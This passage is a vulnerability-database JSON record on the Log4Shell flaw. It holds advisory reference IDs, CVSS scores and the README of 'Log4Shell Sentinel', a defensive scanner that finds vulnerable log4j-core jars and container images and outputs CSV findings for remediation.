&quot;519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C&quot;, &quot;E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902&quot;, &quot;08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6&quot;, &quot;9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A&quot;, &quot;EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B&quot;, &quot;78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533&quot;, &quot;ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC&quot;, &quot;4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B&quot;, &quot;8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8&quot;, &quot;11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B&quot;, &quot;53949D71EE0D6BBA6C433F4DE402EC6D1ED7AA7877C8B84C15AD5E27FFEBE24E&quot;, &quot;8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4&quot;, &quot;1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3&quot;, &quot;7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B&quot;, &quot;9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8&quot;, &quot;DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303&quot;, &quot;8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E&quot;, &quot;53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B&quot;]}, {&quot;type&quot;: &quot;cisa&quot;, &quot;idList&quot;: [&quot;CISA:8367DA0C1A6F51FB2D817745BB204C48&quot;, &quot;CISA:920F1DA8584B18459D4963D91C8DDA33&quot;]}, {&quot;type&quot;: &quot;securelist&quot;, &quot;idList&quot;: [&quot;SECURELIST:7A375F44156FACA25A0B3990F2CD73C1&quot;]}, {&quot;type&quot;: &quot;github&quot;, &quot;idList&quot;: [&quot;GITHUB:D32BE0B8A571761A967462652837D28F&quot;, &quot;GITHUB:070AFCDE1A9C584654244E41373D86D8&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;APACHE_LOG4SHELL_POP3.NBIN&quot;, &quot;UBUNTU_USN-5192-2.NASL&quot;, &quot;APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN&quot;, &quot;LOG4J_LOG4SHELL_WWW.NBIN&quot;, &quot;VMWARE_VCENTER_LOG4SHELL.NBIN&quot;, &quot;APACHE_LOG4SHELL_SSH.NBIN&quot;]}, {&quot;type&quot;: &quot;typo3&quot;, &quot;idList&quot;: [&quot;TYPO3-PSA-2021-004&quot;]}, {&quot;type&quot;: &quot;cloudfoundry&quot;, &quot;idList&quot;: [&quot;CFOUNDRY:690C01663F820378948F8CF2E2405F72&quot;]}, {&quot;type&quot;: &quot;vmware&quot;, &quot;idList&quot;: [&quot;VMSA-2021-0028.7&quot;, &quot;VMSA-2021-0028.1&quot;, &quot;VMSA-2021-0028.4&quot;, &quot;VMSA-2021-0028.3&quot;, &quot;VMSA-2021-0028.6&quot;, &quot;VMSA-2021-0028.2&quot;]}, {&quot;type&quot;: &quot;qt&quot;, &quot;idList&quot;: [&quot;QT:7EFAEDCED59EA2EE3AB98A0A484C5825&quot;]}, {&quot;type&quot;: &quot;qualysblog&quot;, &quot;idList&quot;: [&quot;QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F&quot;, &quot;QUALYSBLOG:42335884011D582222F08AEF81D70B94&quot;, &quot;QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A&quot;]}, {&quot;type&quot;: &quot;checkpoint_advisories&quot;, &quot;idList&quot;: [&quot;CPAI-2021-0936&quot;]}, {&quot;type&quot;: &quot;akamaiblog&quot;, &quot;idList&quot;: [&quot;AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F&quot;, &quot;AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D&quot;]}, {&quot;type&quot;: &quot;f5&quot;, &quot;idList&quot;: [&quot;F5:K19026212&quot;]}, {&quot;type&quot;: &quot;citrix&quot;, &quot;idList&quot;: [&quot;CTX335705&quot;]}, {&quot;type&quot;: &quot;paloalto&quot;, &quot;idList&quot;: [&quot;PA-CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;kitploit&quot;, &quot;idList&quot;: [&quot;KITPLOIT:6759391622067035795&quot;]}, {&quot;type&quot;: &quot;suse&quot;, &quot;idList&quot;: [&quot;OPENSUSE-SU-2021:4094-1&quot;]}], &quot;modified&quot;: &quot;2021-12-23T20:08:15&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 3.9, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T20:08:15&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;}, &quot;lastseen&quot;: &quot;2021-12-23T20:08:15&quot;, &quot;differentElements&quot;: [&quot;description&quot;, &quot;modified&quot;], &quot;edition&quot;: 3}], &quot;viewCount&quot;: 18, &quot;enchantments&quot;: {&quot;dependencies&quot;: {&quot;references&quot;: [{&quot;type&quot;: &quot;ubuntucve&quot;, &quot;idList&quot;: [&quot;UB:CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;debiancve&quot;, &quot;idList&quot;: [&quot;DEBIANCVE:CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;cve&quot;, &quot;idList&quot;: [&quot;CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;rst&quot;, &quot;idList&quot;: [&quot;RST:D86EFFA9-3107-38D5-A9C0-D3CBF091E39D&quot;, &quot;RST:4B2296DE-AF2D-3763-8B79-92DE43775C59&quot;, &quot;RST:88DC31E6-A134-3949-9AF5-51E25878A894&quot;, &quot;RST:06FFD918-46C2-3F1B-A100-A53CD8C0E7CD&quot;, &quot;RST:C857CD75-26C6-3F83-8C9E-226118527715&quot;, &quot;RST:9A0665BB-4202-38BD-A548-1C0EEC9498C9&quot;]}, {&quot;type&quot;: &quot;attackerkb&quot;, &quot;idList&quot;: [&quot;AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94&quot;]}, {&quot;type&quot;: &quot;githubexploit&quot;, &quot;idList&quot;: [&quot;EA1AF0D9-1E6E-5080-BB7C-9D6035795FFB&quot;, &quot;8F15A064-7841-5899-84CE-8C298A269F83&quot;, &quot;7B2DA44B-D36F-56A4-B4D8-376B8D2F5586&quot;, &quot;8B324F0D-EA80-53B5-8ECF-EB5FC5C0EA13&quot;, &quot;5A5A28A1-2601-54F3-BA06-BCFF1A9DCCA5&quot;, &quot;1B11A8A4-B07C-580C-AF38-33A50B17B19A&quot;, &quot;8F362564-1631-5AF9-BB38-D1BFC4678DAE&quot;, &quot;EC35769F-2EAD-5464-8F97-D90F768E1E2D&quot;, &quot;3EA1CA63-F1F5-5A86-AB97-E327DAE18E93&quot;, &quot;865C5B8F-B074-5B0D-834A-E714EB00ADFC&quot;, &quot;9F3ABA17-E33A-5018-9DCB-AECDD8DE9DEE&quot;, &quot;FE8572DF-42D4-521C-B3DC-4715C2F9240D&quot;, &quot;8D0CF3A6-EC3F-536C-A424-08879FF2F158&quot;, &quot;22AAF71B-053F-5E71-9F26-039C48FCCD62&quot;, &quot;817FB04E-AFFE-567B-8A2C-64C0A8923734&quot;, &quot;E59C9A70-6F3E-5CF6-9F15-B0039E0FBAF1&quot;, &quot;066BA250-177D-5017-9AC2-6B948A465ABC&quot;, &quot;D6EE5F29-18C9-5E59-B9E2-01DC93F5ACE9&quot;, &quot;780AD920-FF08-55C6-84C8-A8536C6F5527&quot;, &quot;7BCC0C24-A1F7-531E-B1BA-342D21C9AF02&quot;, &quot;D813949A-183D-55ED-AF64-B130B8F95A56&quot;, &quot;0BC62E37-D6E2-5B2C-BF89-3E00D98D2E30&quot;, &quot;21B5671D-2A35-52FF-9702-380A32B96260&quot;, &quot;CA625124-9F92-5FCF-83A7-3ECF5F0EBBFB&quot;, &quot;22C736D4-4179-585F-990B-A40436F65461&quot;, &quot;ACB6C453-F1D5-5A65-91C2-DF455B997075&quot;]}, {&quot;type&quot;: &quot;wallarmlab&quot;, &quot;idList&quot;: [&quot;WALLARMLAB:060FBB90648BCDE11554492408AE89C8&quot;, &quot;WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884&quot;, &quot;WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB&quot;]}, {&quot;type&quot;: &quot;redhatcve&quot;, &quot;idList&quot;: [&quot;RH:CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;impervablog&quot;, &quot;idList&quot;: [&quot;IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71&quot;, &quot;IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2&quot;, &quot;IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E&quot;]}, {&quot;type&quot;: &quot;msrc&quot;, &quot;idList&quot;: [&quot;MSRC:543F3A129A47F4B14FB170389908717B&quot;]}, {&quot;type&quot;: &quot;rapid7blog&quot;, &quot;idList&quot;: [&quot;RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46&quot;, &quot;RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E&quot;]}, {&quot;type&quot;: &quot;ibm&quot;, &quot;idList&quot;: [&quot;CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67&quot;, &quot;D928C805B6C7AD1BA5D5DA1EB77352559E54787E379CD22474A13592C0B83C20&quot;, &quot;23532FC7488A1E0A5525D86FA8B58841ED6086B69C02A7FBB104B3F98E2ED3CE&quot;, &quot;18A5E6C2581806177DE446AE26FCBC2EBB616C29B40041253F318FF51CE1AFB5&quot;, &quot;6FCF3A6897C9A1A085633762339E7EC8DFE631B6D2A160FA5D1ADBC3E11F92E1&quot;, &quot;519FF26BE329CC59BFF47E2AAC0D4B73FCA35BCF836D736A007D121863323E8C&quot;, &quot;E679F241D5F455DCABCB653D142792B97352015B6DD79A1EB36DB0B4D54B2902&quot;, &quot;08493CBA8B1A8F34C7786760C52C7997B8AE1C300A4CD3A03EEF9B528175E0E6&quot;, &quot;9D21714C8A46FFA3AB195D14E14C9E6854AE7C8D7E68CC48DA42B63AB322B14A&quot;, &quot;EFC94A6E1DA52C8EA7A5811D6A4381770FA24130DB4CFD911120046DD916261B&quot;, &quot;78F199BD0B7C851B9B51668C7C03C7066EA862D4D07B5141F8116EE923472533&quot;, &quot;ED78D94545EF8A4A811D2C198EC427B8C46CA1FE3BBC9D6A2DC20DD440CB6FDC&quot;, &quot;4271B86469CFCE465E783BEC3C9F3EDD13D645F55A5BEB697F3A4FCF694E568B&quot;, &quot;8968C94B71BE086C952CFA8BF1B1924C1CF6FFECA8B8864B828E68AABA1D96E8&quot;, &quot;11FEAADF6A94DFB6615A82EE0023D346C418ECD114C445A6BA52D50AA2C6FE0B&quot;, &quot;53949D71EE0D6BBA6C433F4DE402EC6D1ED7AA7877C8B84C15AD5E27FFEBE24E&quot;, &quot;8FA41F50A028003D6689B034A6CA3E840361D121B9F4B4350B17EAB4605438C4&quot;, &quot;1629CA1DFD389EEFF25556E8C9B707086E571E474449820E949D944C6EB994C3&quot;, &quot;7E846C52FF7D26445DCFC4472B6BC7E4EEADFD45513EDDFC6C395E9B800F576B&quot;, &quot;9D675243F41B597AEE7EC01ACEA307E5B73DA85724CE286F50180E2EF0DDC2E8&quot;, &quot;DCE05236BD35B28C109059A740CACEE5CE345130605BA9DEA39EFDA6BC532303&quot;, &quot;8191B5D601C7F186266C65C8DC79A0B94EDA45737524796672F9272DD3278F4E&quot;, &quot;53D2631E5E76894870663A2B4948D3A4F72BDEEDF8C87935B788F981BEE5852B&quot;]}, {&quot;type&quot;: &quot;cisa&quot;, &quot;idList&quot;: [&quot;CISA:8367DA0C1A6F51FB2D817745BB204C48&quot;, &quot;CISA:920F1DA8584B18459D4963D91C8DDA33&quot;]}, {&quot;type&quot;: &quot;securelist&quot;, &quot;idList&quot;: [&quot;SECURELIST:7A375F44156FACA25A0B3990F2CD73C1&quot;]}, {&quot;type&quot;: &quot;github&quot;, &quot;idList&quot;: [&quot;GITHUB:D32BE0B8A571761A967462652837D28F&quot;, &quot;GITHUB:070AFCDE1A9C584654244E41373D86D8&quot;]}, {&quot;type&quot;: &quot;nessus&quot;, &quot;idList&quot;: [&quot;APACHE_LOG4SHELL_POP3.NBIN&quot;, &quot;UBUNTU_USN-5192-2.NASL&quot;, &quot;APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN&quot;, &quot;LOG4J_LOG4SHELL_WWW.NBIN&quot;, &quot;VMWARE_VCENTER_LOG4SHELL.NBIN&quot;, &quot;APACHE_LOG4SHELL_SSH.NBIN&quot;]}, {&quot;type&quot;: &quot;typo3&quot;, &quot;idList&quot;: [&quot;TYPO3-PSA-2021-004&quot;]}, {&quot;type&quot;: &quot;cloudfoundry&quot;, &quot;idList&quot;: [&quot;CFOUNDRY:690C01663F820378948F8CF2E2405F72&quot;]}, {&quot;type&quot;: &quot;vmware&quot;, &quot;idList&quot;: [&quot;VMSA-2021-0028.7&quot;, &quot;VMSA-2021-0028.1&quot;, &quot;VMSA-2021-0028.4&quot;, &quot;VMSA-2021-0028.3&quot;, &quot;VMSA-2021-0028.6&quot;, &quot;VMSA-2021-0028.2&quot;]}, {&quot;type&quot;: &quot;qt&quot;, &quot;idList&quot;: [&quot;QT:7EFAEDCED59EA2EE3AB98A0A484C5825&quot;]}, {&quot;type&quot;: &quot;qualysblog&quot;, &quot;idList&quot;: [&quot;QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F&quot;, &quot;QUALYSBLOG:42335884011D582222F08AEF81D70B94&quot;, &quot;QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A&quot;]}, {&quot;type&quot;: &quot;checkpoint_advisories&quot;, &quot;idList&quot;: [&quot;CPAI-2021-0936&quot;]}, {&quot;type&quot;: &quot;akamaiblog&quot;, &quot;idList&quot;: [&quot;AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F&quot;, &quot;AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D&quot;]}, {&quot;type&quot;: &quot;f5&quot;, &quot;idList&quot;: [&quot;F5:K19026212&quot;]}, {&quot;type&quot;: &quot;citrix&quot;, &quot;idList&quot;: [&quot;CTX335705&quot;]}, {&quot;type&quot;: &quot;paloalto&quot;, &quot;idList&quot;: [&quot;PA-CVE-2021-44228&quot;]}, {&quot;type&quot;: &quot;kitploit&quot;, &quot;idList&quot;: [&quot;KITPLOIT:6759391622067035795&quot;]}, {&quot;type&quot;: &quot;suse&quot;, &quot;idList&quot;: [&quot;OPENSUSE-SU-2021:4094-1&quot;]}], &quot;modified&quot;: &quot;2021-12-23T20:08:15&quot;, &quot;rev&quot;: 2}, &quot;score&quot;: {&quot;value&quot;: 3.9, &quot;vector&quot;: &quot;NONE&quot;, &quot;modified&quot;: &quot;2021-12-23T20:08:15&quot;, &quot;rev&quot;: 2}}, &quot;objectVersion&quot;: &quot;1.6&quot;, &quot;_object_type&quot;: &quot;robots.models.githubexploit.GithubExploitBulletin&quot;, &quot;_object_types&quot;: [&quot;robots.models.base.Bulletin&quot;, &quot;robots.models.githubexploit.GithubExploitBulletin&quot;], &quot;privateArea&quot;: 1}, {&quot;id&quot;: &quot;97F1C960-A343-5B1E-B261-4834CF80B790&quot;, &quot;vendorId&quot;: null, &quot;hash&quot;: &quot;b5c0dee98c446a8467212988644648c6&quot;, &quot;type&quot;: &quot;githubexploit&quot;, &quot;bulletinFamily&quot;: &quot;exploit&quot;, &quot;title&quot;: &quot;Exploit for Deserialization of Untrusted Data in Apache Log4J&quot;, &quot;description&quot;: &quot;# Log4Shell Sentinel - A Smart CVE-2021-44228 Scanner\n\n## Introd...&quot;, &quot;published&quot;: &quot;2021-12-22T08:35:04&quot;, &quot;modified&quot;: &quot;2021-12-22T21:47:44&quot;, &quot;cvss&quot;: {&quot;score&quot;: 9.3, &quot;vector&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;}, &quot;cvss2&quot;: {&quot;cvssV2&quot;: {&quot;version&quot;: &quot;2.0&quot;, &quot;vectorString&quot;: &quot;AV:N/AC:M/Au:N/C:C/I:C/A:C&quot;, &quot;accessVector&quot;: &quot;NETWORK&quot;, &quot;accessComplexity&quot;: &quot;MEDIUM&quot;, &quot;authentication&quot;: &quot;NONE&quot;, &quot;confidentialityImpact&quot;: &quot;COMPLETE&quot;, &quot;integrityImpact&quot;: &quot;COMPLETE&quot;, &quot;availabilityImpact&quot;: &quot;COMPLETE&quot;, &quot;baseScore&quot;: 9.3}, &quot;severity&quot;: &quot;HIGH&quot;, &quot;exploitabilityScore&quot;: 8.6, &quot;impactScore&quot;: 10.0, &quot;acInsufInfo&quot;: false, &quot;obtainAllPrivilege&quot;: false, &quot;obtainUserPrivilege&quot;: false, &quot;obtainOtherPrivilege&quot;: false, &quot;userInteractionRequired&quot;: false}, &quot;cvss3&quot;: {&quot;cvssV3&quot;: {&quot;version&quot;: &quot;3.1&quot;, &quot;vectorString&quot;: &quot;CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H&quot;, &quot;attackVector&quot;: &quot;NETWORK&quot;, &quot;attackComplexity&quot;: &quot;LOW&quot;, &quot;privilegesRequired&quot;: &quot;NONE&quot;, &quot;userInteraction&quot;: &quot;NONE&quot;, &quot;scope&quot;: &quot;CHANGED&quot;, &quot;confidentialityImpact&quot;: &quot;HIGH&quot;, &quot;integrityImpact&quot;: &quot;HIGH&quot;, &quot;availabilityImpact&quot;: &quot;HIGH&quot;, &quot;baseScore&quot;: 10.0, &quot;baseSeverity&quot;: &quot;CRITICAL&quot;}, &quot;exploitabilityScore&quot;: 3.9, &quot;impactScore&quot;: 6.0}, &quot;href&quot;: &quot;&quot;, &quot;reporter&quot;: &quot;&quot;, &quot;references&quot;: [], &quot;cvelist&quot;: [&quot;CVE-2021-45105&quot;, &quot;CVE-2021-45046&quot;, &quot;CVE-2021-44228&quot;], &quot;immutableFields&quot;: [], &quot;lastseen&quot;: &quot;2021-12-22T23:07:49&quot;, &quot;history&quot;: [{&quot;bulletin&quot;: {&quot;id&quot;: &quot;97F1C960-A343-5B1E-B261-4834CF80B790&quot;, &quot;vendorId&quot;: &quot;GITHUBEXPL:OSSIE-GIT-LOG4SHELL_SENTINEL&quot;, &quot;hash&quot;: &quot;0427b52dd00291500072e9b92ba8e1e5&quot;, &quot;type&quot;: &quot;githubexploit&quot;, &quot;bulletinFamily&quot;: &quot;exploit&quot;, &quot;title&quot;: &quot;Exploit for Deserialization of Untrusted Data in Apache Log4J&quot;, &quot;description&quot;: &quot;# Log4Shell Sentinel - A Smart CVE-2021-44228 Scanner\n\n## Introduction\n\nWhile there have some excellent tools released to help organizations scan their environments for applications vulnerable to the critical [Log4J / CVE-2021-44228]( https://nvd.nist.gov/vuln/detail/CVE-2021-44228 ) vulnerability, I felt that:\n\n* none of the tools I ran into were made for analysts to track a given finding throughout the remediation process. **Log4Shell Sentinel** outputs its findings to CSV format in the expectation that an analyst will then slice and dice findings in Excel, add some findings to an ignore list and re-run the scan, compare scans, add data to scan results, etc.\n* file-based scanners leave a lot of work for analysts to do, especially in containerized environments\n\nSo **Log4Shell Sentinel** was born. Log4Shell Sentinel is a file-based scanner with some unique features. It isn&#x27;t meant to replace all the other available tools but can compliment them.\n\n## Features\n\nLog4Shell Sentinel is a file-based scanner. It searches for Java-based applications by scanning a target system for artifacts of the following file formats:\n\n| File Type | Details |\n|-----------------|-----------|\n|Simple jar|This is the case where the log4j-core file is not embedded.|\n|Fat / Uber jar|An **uber jar** is a jar that contains both your classes / package and all your application&#x27;s dependencies (libraries, resources and metadata files) within a single jar file. This is the most commonly used deployment option.|\n|WAR|A **war** (Web Application Archive) file is a file that contains your JSP, HTML and JavaScript code in addition to your libraries and other resources. This format is less commonly used.|\n|EAR|An **ear** (Enterprise Application Archive) is another format that was more commonly used with Jakarta EE for deployments.|\n\nand searches for instances of vulnerable **log4j-core** jars. It then:\n\n* calculates a MD5 hash of the artifact. This allows an analyst to identify the same application running on different machines / containers and treat them as a single finding\n* for files determined to belong to a container such as: `/var/lib/docker/overlay2/192768f471818601094bf4edd96d14bfc0e2b178a04a2efd00b2231ad4e46b33/merged/app/spring-boot-application.jar`, it does the heavy lifting of mapping the file to the corresponding image. For example, it would translate the above to the following image: `ghcr.io/christophetd/log4shell-vulnerable-app:latest`. As the various container runtimes store this mapping in different ways, this can save an analyst hours of frustration. This also allows an analyst to treat a number of containers running a single application as a single finding.\n* it removes useless matches such as matches corresponding to containers that are currently not running including cached images. This allows an analyst to focus on what is important and again saves the analyst hours of needless work\n* it allows an analyst to ignore matches based on:\n  - MD5 hash\n  - file path\n  - container image\n\n  This allows the analyst to remove applications they know are not vulnerable or which correspond to CLI-based applications that do not pose a threat. For example, if an instance of Logstash is detected, an analyst can choose to ignore it if they do not run the tool or simply run it as from the CLI occasionally.\n\n* it is optimized to work with your configuration management tools such as Ansible, giving you the ability to quickly scan your environment in minutes\n\n### Metadata Enrichment\n\nFor details on the metadata enrichment added by Log4Shell Sentinel, refer to the my blog [post](https://osamaelnaggar.com/blog/introducing_log4shell_sentinel/).\n\n## Installation\n\nThe easiest way is to simply download the pre-compiled binary.\n\n### Building From Source\n\nAgain, this is straight-forward. However, you will likely want to build a statically compiled version to get around any GLIBC-related variations in your environment. The tool uses the following modules which use CGO by default:\n\n* `os/user`\n* `net`\n\nTo build a statically compiled version that uses the Go-versions of these libraries, simply clone the repo and then run:\n\n~~~\n$ CGO_ENABLED=0 go build -ldflags=\&quot;-s -w\&quot;\n$ ldd log4shell_sentinel\n        not a dynamic executable\n~~~\n\n## Usage\n\n~~~\n$ ./log4shell_sentinel -h\nNAME:\n   Log4Shell Sentinel - by Osama Elnaggar\n\nUSAGE:\n   log4shell_sentinel [global options] command [command options] [arguments...]\n\nVERSION:\n   v1.0.0\n\nCOMMANDS:\n   help, h  Shows a list of commands or help for one command\n\nGLOBAL OPTIONS:\n   --path value, -p value       Path to search (default: \&quot;.\&quot;)\n   --no-banner, --nb            Suppress banner (default: false)\n   --no-messages, --nm          Suppress messages except for CSV output (default: false)\n   --no-header, --nh            Suppress header in CSV output (default: false)\n   --imd5 value, --im value     Ignore MD5 hashes. Refer to the GitHub page for expected format\n   --ipath value, --ip value    Ignore file path matches. Refer to the GitHub page for expected format\n   --icimage value, --ic value  Ignore container image matches. Refer to the GitHub page for expected format\n   --print-headers, --ph        Print CSV Headers only (default: false)\n   --help, -h                   show help (default: false)\n   --version, -v                print the version (default: false)\n~~~\n\nOut of the box, a scan will simply scan the current directory. For example:\n\n~~~\n$ ./log4shell_sentinel\n\n\u2591\u2588\u2591\u2591\u2591\u2588\u2580\u2588\u2591\u2588\u2580\u2580\u2591\u2588\u2591\u2588\u2591\u2588\u2580\u2580\u2591\u2588\u2591\u2588\u2591\u2588\u2580\u2580\u2591\u2588\u2591\u2591\u2591\u2588\u2591\u2591\u2591\u2591\u2591\u2588\u2580\u2580\u2591\u2588\u2580\u2580\u2591\u2588\u2580\u2588\u2591\u2580\u2588\u2580\u2591\u2580\u2588\u2580\u2591\u2588\u2580\u2588\u2591\u2588\u2580\u2580\u2591\u2588\u2591\u2591\n\u2591\u2588\u2591\u2591\u2591\u2588\u2591\u2588\u2591\u2588\u2591\u2588\u2591\u2591\u2580\u2588\u2591\u2580\u2580\u2588\u2591\u2588\u2580\u2588\u2591\u2588\u2580\u2580\u2591\u2588\u2591\u2591\u2591\u2588\u2591\u2591\u2591\u2591\u2591\u2580\u2580\u2588\u2591\u2588\u2580\u2580\u2591\u2588\u2591\u2588\u2591\u2591\u2588\u2591\u2591\u2591\u2588\u2591\u2591\u2588\u2591\u2588\u2591\u2588\u2580\u2580\u2591\u2588\u2591\u2591\n\u2591\u2580\u2580\u2580\u2591\u2580\u2580\u2580\u2591\u2580\u2580\u2580\u2591\u2591\u2591\u2580\u2591\u2580\u2580\u2580\u2591\u2580\u2591\u2580\u2591\u2580\u2580\u2580\u2591\u2580\u2580\u2580\u2591\u2580\u2580\u2580\u2591\u2591\u2591\u2580\u2580\u2580\u2591\u2580\u2580\u2580\u2591\u2580\u2591\u2580\u2591\u2591\u2580\u2591\u2591\u2580\u2580\u2580\u2591\u2580\u2591\u2580\u2591\u2580\u2580\u2580\u2591\u2580\u2580\u2580\n\n- A CVE-2021-44228/CVE-2021-45046/CVE-2021-45105 Scanner\n- v1.0.0\n- by Osama Elnaggar\n\n[*] WARNING: Running as non-root user.\n             Non-readable files / dirs will be skipped\n             Container mapping will fail\n\n[*] Starting shallow scan ............ [DONE]\n[*] Starting deep scan ............... [DONE]\n[*] Calculating MD5 hashes ........... [DONE]\n[*] Performing container image lookups [DONE]\n[*] Processing ignore list(s) ........ [DONE]\n[*] Generating output ................ [DONE]\n\nIP,Hostname,AppName,Team,Ignore (Y/N),Comments,MD5Hash,Timestamp,Container,ContainerImage,FullPath,Version\n192.168.121.121,server3,,,,,4e615cd580758b70c49ade1f79103328,2021-12-21T07:38:09Z,true,ghcr.io/christophetd/log4shell-vulnerable-app:latest,/run/containerd/io.containerd.runtime.v2.task/k8s.io/dc2c9c214809f506283c917244cd126a9b056ac7274322d12b59c9196d95dd9b/rootfs/app/spring-boot-application.jar,log4j-core-2.14.1.jar\n~~~\n\nYou&#x27;ll immediately get a **WARNING** if you run it as a non-root user as it requires `root` permissions:\n\n* if you plan on scanning your entire filesystem (recommended)\n* if you plan on enriching performing container -&gt; image lookups (access to the Docker daemon, config files, etc. is required)\n\nIt will still work without `root` privileges but may not give you the best results.\n\n### Understanding Findings\n\nA sample finding looks like this:\n\n~~~\nIP,Hostname,AppName,Team,Ignore (Y/N),Comments,MD5Hash,Timestamp,Container,ContainerImage,FullPath,Version\n192.168.121.121,server3,,,,,4e615cd580758b70c49ade1f79103328,2021-12-21T07:38:09Z,true,ghcr.io/christophetd/log4shell-vulnerable-app:latest,/run/containerd/io.containerd.runtime.v2.task/k8s.io/dc2c9c214809f506283c917244cd126a9b056ac7274322d12b59c9196d95dd9b/rootfs/app/spring-boot-application.jar,log4j-core-2.14.1.jar\n~~~\n\nSome fields are intentionally left empty and left for the analyst to fill in in Excel, etc. A short description of each field is shown below:\n\n|Field|Example|Description|\n|------|------|------|\n|IP|192.168.121.121|If the instance has multiple IPs, the primary IP is added|\n|Hostname|server3|Hostname|\n|AppName||This is left to the user to complete after the scan is completed|\n|Team||This is left to the user to complete after the scan is completed|\n|Ignore (Y/N)||This is left to the user to complete after the scan is completed|\n|Comment||This is left to the user to complete after the scan is completed|\n|MD5Hash|4e615cd580758b70c49ade1f79103328|A unique fingerprint of our application|\n|Timestamp|2021-12-21T07:38:09Z|A timestamp when the scan was performed. This is useful if you want to aggregate multiple scans of the same host|\n|Container|true|True = this is a container|\n|ContainerImage|ghcr.io/christophetd/log4shell-vulnerable-app:latest|If a container was detected, this is the corresponding image|\n|FullPath|/run/containerd/io.containerd.&lt;br&gt;runtime.v2.task/k8s.io/.../spring-boot-application.jar|The full path of the finding. In this example, the vulnerable JAR file is part of a fat / uber jar|\n|Version|log4j-core-2.14.1.jar|The lo4j-core version detected|\n\n### Options\n\nThe tool comes with the following options:\n\n|Option|Details|\n|------|------|\n|`--path value, -p value`|This specifies what paths to search. By default, it searches the current directory. **IMPORTANT** It is recommended that you set this to `/` to cover your entire filesystem|\n|`--no-banner, --nb`|This suppresses the banner|\n|`--no-messages, --nm`|This suppresses messages such a progress-related messages|\n|`--no-header, --nh`|This suppresses the CSV output&#x27;s header. This is recommended when running it across multiple servers|\n|`--imd5 value, --im value`|Ignore MD5 hashes. More on this in the **Ignore Lists** section|\n|`--ipath value, --ip value`|Ignore file path matches.  More on this in the **Ignore Lists** section|\n|`--icimage value, --ic value`|Ignore container image matches. More on this in the **Ignore Lists** section|\n|`--print-headers, --ph`|Print CSV Headers only. When you run Log4Shell Sentinel on multiple servers and aggregate the results, you would typically disable header output. This command outputs the header only so you can add it to your Excel sheet|\n\n### Container Mapping -&gt; Image Support\n\nOne of Log4Shell Sentinel&#x27;s unique features not found in any other tool is the ability to translate jars found in file system scans such as:\n\n`/var/lib/docker/overlay2/192768f471818601094bf4edd96d14bfc0e2b178a04a2efd00b2231ad4e46b33/merged/app/spring-boot-application.jar`\n\nto the corresponding container image (the above translates to `ghcr.io/christophetd/log4shell-vulnerable-app:latest` for example). As the various container runtimes store this mapping in different ways, this can save an analyst hours of frustration. This also allows an analyst to treat a number of containers running a single application as a single finding. The solution currently supports the following lookups:\n\n* Docker (with overlay2 storage driver)\n* Docker (with aufs storage driver)\n* CRI-O\n* containerd\n\n### Ignore Lists\n\nThe number of applications identified may initially be overwhelming or you may want to focus on a given subset of identified applications such as those exposed to external users first. Or you may want to focus on a given compliance scope. To support this, the application supports specifying a list. Log4Shell currently supports 3 ignore lists:\n\n* MD5 hash ignore list\n* container image ignore list\n* path ignore list\n\nInstead of simple lists, it expects a CSV file as input. This encourages the analyst to document why they are ignoring a given finding. As the analyst processes the findings and identifies non-vulnerable applications using manual or automated source code analysis or DAST tools, etc.\n\n#### MD5 Hash Ignore List\n\nThe list is a simple 